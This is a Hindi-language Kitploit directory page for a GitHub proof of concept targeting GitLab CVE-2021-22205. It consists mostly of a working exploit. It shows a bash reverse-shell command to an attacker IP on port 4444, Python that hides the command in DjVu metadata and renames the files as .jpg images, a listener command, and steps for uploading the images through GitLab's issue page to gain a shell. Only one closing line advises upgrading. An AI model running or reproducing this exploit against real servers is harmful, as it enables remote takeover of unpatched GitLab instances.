Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
उपकरण/GitHubGitHub/shang159/cve-2021-22205-getshell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22205-getshell

CVE-2021-22205-getshell

परीक्षण संस्करण

शोषण उत्पन्न करने के लिए कमांड बनाएं

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

djvumake का उपयोग करके शोषण इमेज बनाएं

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1

स्थानीय रूप से पोर्ट 4444 पर सुनें और रिवर्स शेल की प्रतीक्षा करें

root@kitploit:~
nv -lv 192.168.147.5 4444

GitLab पर इमेज अपलोड करें

  • यहाँ ऑनलाइन एक्सप्लॉइट से अंतर है। कई शोषण एक्सप्लॉइट उच्च संस्करण (12 या 13) के GitLab का उपयोग करते हैं, जहाँ अपलोड पॉइंट नया स्निपेट बनाना है, पथ: /uploads/user
  • मेरे द्वारा सत्यापित संस्करण 11.10.0 है। सार्वजनिक अपलोड पथ /uploads/user का उपयोग करने पर 404 त्रुटि मिली। स्निपेट के अपलोड पथ /uploads/personal_snippet का उपयोग करने पर कमांड निष्पादित नहीं हुआ।
  • अंततः, नया Issue बनाने के पृष्ठ से इमेज अपलोड करके कमांड निष्पादन सफलतापूर्वक किया गया।

सफलतापूर्वक रिवर्स शेल प्राप्त करके लक्ष्य मशीन पर अधिकार प्राप्त करना

तीन इमेज अपलोड करने के बाद, तीसरी इमेज रिवर्स शेल कमांड निष्पादित करेगी और लक्ष्य मशीन पर सफलतापूर्वक अधिकार प्राप्त होगा।

सुधार के सुझाव

GitLab को नवीनतम सुरक्षित संस्करण में शीघ्रता से अपग्रेड करें।

टूल डाउनलोड करें